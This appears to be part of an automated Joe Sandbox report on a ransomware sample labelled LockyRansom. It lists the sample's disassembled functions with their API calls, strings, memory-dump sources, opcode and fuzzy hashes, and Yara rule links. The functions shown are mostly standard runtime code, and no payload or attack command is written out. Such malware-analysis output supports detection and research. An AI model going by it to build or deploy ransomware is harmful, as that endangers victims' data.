Function 0040CC4E Relevance: 1.5, APIs: 1, Instructions: 3comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 0040CC4E

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ea4d4a68d56fb357ec32c0393e0744c9017ac68711543bc46e52ea342fe44e31
Instruction ID: 435566210d79d3c25084ce6b1cccf0afc57128ea6fb01bb8d070ec23f3dca18c
Opcode Fuzzy Hash: ea4d4a68d56fb357ec32c0393e0744c9017ac68711543bc46e52ea342fe44e31
Instruction Fuzzy Hash:

Function 0040B2C4 Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE

Download Yara Rule

Strings

N@, xrefs: 0040B2D4

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID:
String ID: N@
API String ID: 0-1509896676
Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction ID: c1686b08318381e129178c9fe2bba932ff1ec08a115dc8d019638c05c9233651
Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
Instruction Fuzzy Hash: 3E6117719003158FCB18CF49C49469EBBA2FF84314F2AC5BED8096B3A2C7B59955CBC8

Function 0069007E Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
Instruction ID: 2a0ff11ffc66d7c7834fdc3671ae0ba50ecfbac40b3d35c85555e37606334ebc
Opcode Fuzzy Hash: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
Instruction Fuzzy Hash: 5A418372100104EFEF50EF58C845EAAB7AEEF84724B25451DF80597B12C771EC42CBA4

Function 004022D0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 0989f8679564657a94d75670a29f3e5bc62fdd8ba82d2e08f4d30ee6f724cbb3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 33117D7720004243D615863DDBBC6BBE39AFBC532476C837BD8416B7D4D2BEEA459908

Function 006903EE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction ID: 1d81f476b733d0b43d4220e814000faadb41cd3f1387b8520e11976a2769abfc
Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction Fuzzy Hash: 02E0E231100044CFDF9A9F20D950690BBB6FB58729F38C8ADA8025A6A2CB76C963DE00

Function 005C03EE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction ID: 7d24b00bc07c04ef41814a5a6730787244e6255f9bebe18d54b9fc0054544f40
Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
Instruction Fuzzy Hash: B3E0EC31100044CFCF5D9F50D994B51BB62FB48329F34D8AD94025A1D2C776C953CE00

Function 0040C58C Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3264ce0374d2910ace50dfbec309423fade262f275f8ce23c757caaf87853f
Instruction ID: 072e47c4920cc5aec20cf316f301896d0833a00b56cdd122c8161bd88124dfea
Opcode Fuzzy Hash: 2e3264ce0374d2910ace50dfbec309423fade262f275f8ce23c757caaf87853f
Instruction Fuzzy Hash: 46B012D0C4C016EAC300CF8048C09F0639D450F3881702173680F310C2923C100F711F

Function 00403D74 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00402B94), ref: 00403D7C
__mtterm.LIBCMT ref: 00403D88

Part of subcall function 00403AC1: TlsFree.KERNEL32(00000015,00403EEA,?,00402B94), ref: 00403AEC
Part of subcall function 00403AC1: DeleteCriticalSection.KERNEL32(00000000,00000000,Function_0006DE10,?,00403EEA,?,00402B94), ref: 00406968
Part of subcall function 00403AC1: _free.LIBCMT ref: 0040696B
Part of subcall function 00403AC1: DeleteCriticalSection.KERNEL32(00000015,Function_0006DE10,?,00403EEA,?,00402B94), ref: 00406992

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00403D9E
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00403DAB
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00403DB8
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00403DC5
TlsAlloc.KERNEL32(?,00402B94), ref: 00403E15
TlsSetValue.KERNEL32(00000000,?,00402B94), ref: 00403E30
__init_pointers.LIBCMT ref: 00403E3A
__calloc_crt.LIBCMT ref: 00403EA8
GetCurrentThreadId.KERNEL32 ref: 00403ED4

Strings

FlsFree, xrefs: 00403DBA
KERNEL32.DLL, xrefs: 00403D77
FlsGetValue, xrefs: 00403DA0
FlsAlloc, xrefs: 00403D98
FlsSetValue, xrefs: 00403DAD

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 4163708885-3819984048
Opcode ID: 4312e2d89dab64fa0104fb7ac2644e61afca37bc80ed00e98ce8477f12054ac2
Instruction ID: 8b888edff67a3ad70612f4db2fe864331e61a9c68ef0f356476727beb791fc7b
Opcode Fuzzy Hash: 4312e2d89dab64fa0104fb7ac2644e61afca37bc80ed00e98ce8477f12054ac2
Instruction Fuzzy Hash: 52316F359412119FC721AF75AC0965F3EACEB44366B14493FE408A22F1FB78A582CF8C

Function 00405B80 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00405C81
__FindPESection.LIBCMT ref: 00405C9B

Strings

L"H, xrefs: 00405CBF
L"H, xrefs: 00405E23
L"H, xrefs: 00405EA6
P"H, xrefs: 00405E6C

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID: L"H$L"H$L"H$P"H
API String ID: 876702719-989293535
Opcode ID: ec60c86e5f064fd136c6facc0da41a19ef79b1499b8fa922a0b60d688d53f1d9
Instruction ID: a4a187f7893baabdcc40696e7cee2dbda72870aac3330e258b1bf9c816fb411f
Opcode Fuzzy Hash: ec60c86e5f064fd136c6facc0da41a19ef79b1499b8fa922a0b60d688d53f1d9
Instruction Fuzzy Hash: EF919F31A00A158BCB14CB58DE84A6FB7B5EB84314F19867ED815A73E0E779BD01CF98

Function 00403AFE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0047D118,00000008,00403C06,00000000,00000000,?,?,00403C33,?,00403993,?,?,?,?,004014DA), ref: 00403B0F
__lock.LIBCMT ref: 00403B43

Part of subcall function 00406A7B: __mtinitlocknum.LIBCMT ref: 00406A91
Part of subcall function 00406A7B: __amsg_exit.LIBCMT ref: 00406A9D
Part of subcall function 00406A7B: EnterCriticalSection.KERNEL32(?,?,?,00403B48,0000000D), ref: 00406AA5

InterlockedIncrement.KERNEL32(0047F0C0), ref: 00403B50
__lock.LIBCMT ref: 00403B64
___addlocaleref.LIBCMT ref: 00403B82

Strings

KERNEL32.DLL, xrefs: 00403B0A

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 8f43d038396513cc1108d5275fee649a29e531a8df2a5bb85cd32a1fca4d78e5
Instruction ID: 2ffde6999effc74a69af65c99416a8a4a9d8d089b71300a6b4413e5e97229ca2
Opcode Fuzzy Hash: 8f43d038396513cc1108d5275fee649a29e531a8df2a5bb85cd32a1fca4d78e5
Instruction Fuzzy Hash: E6016571440B00DED720AF66D805749BBF0AF44329F10C96FE499A72E1CBB8A644CF5D

Function 004030D2 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004030FA

Part of subcall function 00401706: __getptd.LIBCMT ref: 00401714
Part of subcall function 00401706: __getptd.LIBCMT ref: 00401722

__getptd.LIBCMT ref: 00403104

Part of subcall function 00403C2B: __getptd_noexit.LIBCMT ref: 00403C2E
Part of subcall function 00403C2B: __amsg_exit.LIBCMT ref: 00403C3B

__getptd.LIBCMT ref: 00403112
__getptd.LIBCMT ref: 00403120
__getptd.LIBCMT ref: 0040312B
_CallCatchBlock2.LIBCMT ref: 00403151

Part of subcall function 004017AB: __CallSettingFrame@12.LIBCMT ref: 004017F7

Part of subcall function 004031F8: __getptd.LIBCMT ref: 00403207
Part of subcall function 004031F8: __getptd.LIBCMT ref: 00403215

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: c8ea14c48ec3dafb2686cdc7662d224293065d6d198c10f6c396cd809f4ce707
Instruction ID: 06ed299fc67d69363dc9ea59341c91f50d08a0826c7cc7073de9a2c0acbfd0cb
Opcode Fuzzy Hash: c8ea14c48ec3dafb2686cdc7662d224293065d6d198c10f6c396cd809f4ce707
Instruction Fuzzy Hash: 7811DAB1D00209DFDB00EFA5D485AED7BB4FF08315F10846AF915BB291DB389A159F58

Function 00404AD2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00404ADE

Part of subcall function 00403C2B: __getptd_noexit.LIBCMT ref: 00403C2E
Part of subcall function 00403C2B: __amsg_exit.LIBCMT ref: 00403C3B

__amsg_exit.LIBCMT ref: 00404AFE
__lock.LIBCMT ref: 00404B0E
InterlockedDecrement.KERNEL32(?), ref: 00404B2B
_free.LIBCMT ref: 00404B3E
InterlockedIncrement.KERNEL32(005F16A8), ref: 00404B56

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 5aa733620e5a4d8593877c454b5b04f20938e8fa442ad478ddecba1a0c4b9358
Instruction ID: f70d5ca2ae25dcaacdb068c35f7efa3073006e89de48438a6d1067d2ab3826f3
Opcode Fuzzy Hash: 5aa733620e5a4d8593877c454b5b04f20938e8fa442ad478ddecba1a0c4b9358
Instruction Fuzzy Hash: 350184719016119BCB20AF659405B5AB770BF80725F01413BEA14B72D1CB3CA991CFED

Function 004019EC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00401A06

Part of subcall function 004025E9: __FF_MSGBANNER.LIBCMT ref: 00402602
Part of subcall function 004025E9: __NMSG_WRITE.LIBCMT ref: 00402609
Part of subcall function 004025E9: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004042D3,?,00000001,?,?,00406A06,00000018,0047D268,0000000C,00406A96), ref: 0040262E

std::exception::exception.LIBCMT ref: 00401A3B
std::exception::exception.LIBCMT ref: 00401A55
__CxxThrowException@8.LIBCMT ref: 00401A66

Strings

bad allocation, xrefs: 00401A34

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 1414122017-2104205924
Opcode ID: dd0a727d412a99a38f337528a6f696f83dbb749607bdf7b739e49051a6b6bc6c
Instruction ID: 028863445d999e7ddb7cb020533b97c7bcca977f4d2f1e5dd5d829e9eeb1379f
Opcode Fuzzy Hash: dd0a727d412a99a38f337528a6f696f83dbb749607bdf7b739e49051a6b6bc6c
Instruction Fuzzy Hash: 7CF02D71500209AACF01FB95DC16ADE76ACAB40B64F10443FF404B61F1DBBCAA01EB9D

Function 00402E25 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00402E46

Part of subcall function 00403C2B: __getptd_noexit.LIBCMT ref: 00403C2E
Part of subcall function 00403C2B: __amsg_exit.LIBCMT ref: 00403C3B

__getptd.LIBCMT ref: 00402E57
__getptd.LIBCMT ref: 00402E65

Strings

RCC, xrefs: 00402E31
MOC, xrefs: 00402E38

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC
API String ID: 803148776-2084237596
Opcode ID: 4ef74240ec90304c9825e8749e3abc04707331b2d9bd585815828cb470b1b83c
Instruction ID: 00536308d21a22bf27e2a4df986bf6a4d43c3ec3e36d4f68562106e66f084ee6
Opcode Fuzzy Hash: 4ef74240ec90304c9825e8749e3abc04707331b2d9bd585815828cb470b1b83c
Instruction Fuzzy Hash: D8E0ED311541048ED720EB65C14AB693799AB44719F5504B7E40CE72E2C77C9D51859A

Function 00406C42 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00406C50

Part of subcall function 004025E9: __FF_MSGBANNER.LIBCMT ref: 00402602
Part of subcall function 004025E9: __NMSG_WRITE.LIBCMT ref: 00402609
Part of subcall function 004025E9: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004042D3,?,00000001,?,?,00406A06,00000018,0047D268,0000000C,00406A96), ref: 0040262E

_free.LIBCMT ref: 00406C63

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 7c7a77ffeeba3ab351510b4897178a67e34d8eae39321d47113850ce6761e66c
Instruction ID: df80903755594c7828d429858351263d1b3aae269e04d142ccdc91c4918d66d3
Opcode Fuzzy Hash: 7c7a77ffeeba3ab351510b4897178a67e34d8eae39321d47113850ce6761e66c
Instruction Fuzzy Hash: C8118632508515ABDB212F75AD0965B3B59EF413A4F11443FF98AB72D0DA3C88518A9C

Function 0040819D Relevance: 7.6, APIs: 5, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 004081CB
_free.LIBCMT ref: 004081DE
GetLastError.KERNEL32 ref: 004081E6
SysAllocString.OLEAUT32(00000000), ref: 00408201
_free.LIBCMT ref: 00408212

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: _free$AllocByteCharErrorLastMultiStringWide
String ID:
API String ID: 3133011222-0
Opcode ID: bc82d39e01e67ed99766be2847f5b97c9e4e56bc687e09c211bae6028e419a2c
Instruction ID: 30ba549a4eee6cf19f9ffa8e7ba075b7df5f147c963a6edcc105614ef90dac44
Opcode Fuzzy Hash: bc82d39e01e67ed99766be2847f5b97c9e4e56bc687e09c211bae6028e419a2c
Instruction Fuzzy Hash: BF113672A00204ABDB106FA19D4AB9FB768EF58324F10013EF94AB33C1DE3C9840869D

Function 00405253 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0040525F

Part of subcall function 00403C2B: __getptd_noexit.LIBCMT ref: 00403C2E
Part of subcall function 00403C2B: __amsg_exit.LIBCMT ref: 00403C3B

__getptd.LIBCMT ref: 00405276
__amsg_exit.LIBCMT ref: 00405284
__lock.LIBCMT ref: 00405294
__updatetlocinfoEx_nolock.LIBCMT ref: 004052A8

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e66a23c1465529627609f0aa4e74cdbb8ddc599dbd6996746f640d686a304ab2
Instruction ID: 1ac569b215983e25c4b2fe823b41980f85c2d57bc4c7f73bd7e2ba63bb5ff397
Opcode Fuzzy Hash: e66a23c1465529627609f0aa4e74cdbb8ddc599dbd6996746f640d686a304ab2
Instruction Fuzzy Hash: 4EF0F632900B00DAD620BFB56806B5E37A0EF01729F1141BFF505B72D2CB3C59418E5D

Function 0041E740 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0041E791
GetLastError.KERNEL32 ref: 0041E842
GetModuleFileNameW.KERNEL32(?,?,00000208), ref: 0041E862

Strings

z, xrefs: 0041E753

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ErrorException@8FileLastModuleNameThrow
String ID: z
API String ID: 4146140499-1657960367
Opcode ID: 8eb1cc0b0a6c23bc4261ccbff72b2638faee4e672a5b537ff65235432a463578
Instruction ID: 6f6b27e85dc37ee0d97dc9d12b2ed399787178d8b2bf7e3b4edf494c55770e42
Opcode Fuzzy Hash: 8eb1cc0b0a6c23bc4261ccbff72b2638faee4e672a5b537ff65235432a463578
Instruction Fuzzy Hash: 28313E3C18E108EAF6149A43C4849F5776CAB4B300B3068679D2B971D1D73C5AC7B65F

Function 00416680 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00416691

Part of subcall function 00407FE6: std::exception::exception.LIBCMT ref: 00407FFB
Part of subcall function 00407FE6: __CxxThrowException@8.LIBCMT ref: 00408010
Part of subcall function 00407FE6: std::exception::exception.LIBCMT ref: 00408021

std::_Xinvalid_argument.LIBCPMT ref: 004166AE

Part of subcall function 00408033: std::exception::exception.LIBCMT ref: 00408048
Part of subcall function 00408033: __CxxThrowException@8.LIBCMT ref: 0040805D
Part of subcall function 00408033: std::exception::exception.LIBCMT ref: 0040806E

Strings

string too long, xrefs: 00416680
invalid string position, xrefs: 004166A0

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

